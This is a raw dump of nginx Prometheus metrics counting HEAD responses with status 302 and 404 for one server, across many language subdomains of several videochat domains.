nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="yi.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="yi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="yi.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="zh.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="zh.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="-"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="112.124.42.80:63435"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="161.97.120.25"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="161.97.120.25:80"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="af.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="af.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="af.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="aivwnaz.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="al.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="al.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="al.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="am.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="amadorseniorcenter-oit.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="api.videochat.mx"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.cafe"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ar.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="asset.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="az.videochat.world"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ba.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.cafe"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="be.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.cafe"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bg.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bn.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bn.videochat.tv.br"} 199 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bn.videochat.world"} 918 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bs.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bs.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="bs.videochat.world"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ca.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ca.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ca.videochat.world"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ceb.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ceb.videochat.date"} 600 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ceb.videochat.world"} 101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.date"} 552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.show"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.tv.br"} 340 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="chm.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.date"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cs.videochat.world"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cy.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cy.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="cy.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="czhdzka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="da.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="da.videochat.date"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="da.videochat.tv.br"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="da.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="de.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="de.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="de.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="de.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.tv.br"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ee.videochat.world"} 469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="el.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="el.videochat.mx"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="el.videochat.tv.br"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="el.videochat.world"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="en.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="en.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="en.videochat.tv.br"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eo.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eo.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eo.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="es.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="es.videochat.date"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="es.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="es.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="et.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="et.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="et.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="eu.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.tv.br"} 143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fa.videochat.world"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.date"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.tv.br"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fi.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fr.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fr.videochat.mx"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fr.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="fr.videochat.world"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ga.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.tv.br"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gl.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gu.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gu.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="gu.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.date"} 121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="he.videochat.world"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.date"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hi.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.show"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hr.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ht.videochat.cafe"} 556 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ht.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ht.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ht.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="httpgl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hu.videochat.cafe"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hu.videochat.date"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hu.videochat.tv.br"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="hu.videochat.world"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="id.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="id.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="id.videochat.world"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="is.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="is.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="is.videochat.world"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="it.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="it.videochat.date"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="it.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="it.videochat.world"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.date"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jp.videochat.world"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jutvtfa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jv.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jv.videochat.tv.br"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="jv.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ka.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ka.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kk.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.date"} 562 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.tv.br"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="km.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kn.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kn.videochat.tv.br"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="kn.videochat.world"} 1465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ko.videochat.date"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ko.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ko.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.show"} 1836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ky.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lb.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lb.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lb.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lb.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lo.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.date"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lt.videochat.world"} 89 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.date"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mail.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.world"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.world"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.mx"} 147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.world"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mpositesmodeca.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.cafe"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.mx"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.world"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="my.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="my.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="my.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="my.videochat.world"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.date"} 1 